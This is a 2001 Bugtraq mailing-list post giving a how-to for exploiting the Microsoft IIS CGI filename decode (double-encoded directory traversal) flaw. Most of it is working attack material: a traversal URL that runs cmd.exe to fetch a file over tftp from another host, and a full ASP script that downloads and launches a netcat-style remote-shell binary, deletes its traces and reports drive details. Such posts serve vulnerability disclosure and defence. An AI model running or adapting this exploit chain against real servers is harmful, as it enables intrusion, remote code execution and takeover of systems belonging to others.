[20695] in bugtraq
Microsoft IIS CGI Filename Decode Error V - How to
daemon@ATHENA.MIT.EDU (Adriano Dias)
Thu May 17 11:42:08 2001
Message-ID: <8BDA1EB00303F74E87168276E2E687830FCE02@hermes.proteus.net>
From: Adriano Dias <adias@proteus.com.br>
To: "'bugtraq@securityfocus.com'" <bugtraq@securityfocus.com>
Date: Thu, 17 May 2001 09:01:59 -0300
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Thats what I did:
http://192.168.0.1/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.ex
e?/c+tftp.exe+-i+192.168.0.2+GET+f.asp+c:\inetpub\scripts\f.asp
then i ran http://192.168.0.1/f.asp
following is a copy of the f.asp:
----------cut here-------------------------
<%
Set fs = CreateObject("Scripting.FileSystemObject")
Set drv = fs.Drives
dmax = ""
dmac = 0
For each d in drv
If d.Driveletter <> "A" And d.IsReady Then
If d.AvailableSpace > dmac then
dmac = d.AvailableSpace
dmab = d.DriveType
dmaa = d.TotalSize
dmad = d.SerialNumber
dmax = d.DriveLetter
End If
End If
Next
filename = server.mappath("dl.bat")
Set tf = fs.CreateTextFile(filename, True)
tf.WriteLine("@echo off")
tf.WriteLine("cd \Inetpub\scripts")
tf.WriteLine("startDL:")
tf.WriteLine("tftp.exe -i 192.168.1.33 get ncx99.exe
c:\inetpub\scripts\nc0.exe")
tf.WriteLine("if not exist ncx99.exe goto startDL")
tf.WriteLine("start /w nc0.exe")
tf.WriteLine("attrib TFTP* -r")
tf.WriteLine("attrib nc0.exe -r")
tf.WriteLine("del TFTP*")
tf.WriteLine("exit")
tf.Close
dim command
dim wshShell
command = server.mappath("dl.bat") & " " & dmax
On Error Resume Next
Set wshShell = CreateObject("WScript.Shell")
wshShell.Run (command)
If Err Then
Set objFSO = Server.CreateObject("scripting.filesystemobject")
pathname = server.mappath("dl.bat")
objFSO.DeleteFile pathname
Set objFSO = Nothing
Else
Response.Write "|" & dmax & "*" & dmab & "*" & dmac & "*" & dmaa & "*" &
dmad
End If
%>
-----------cut here----------------------
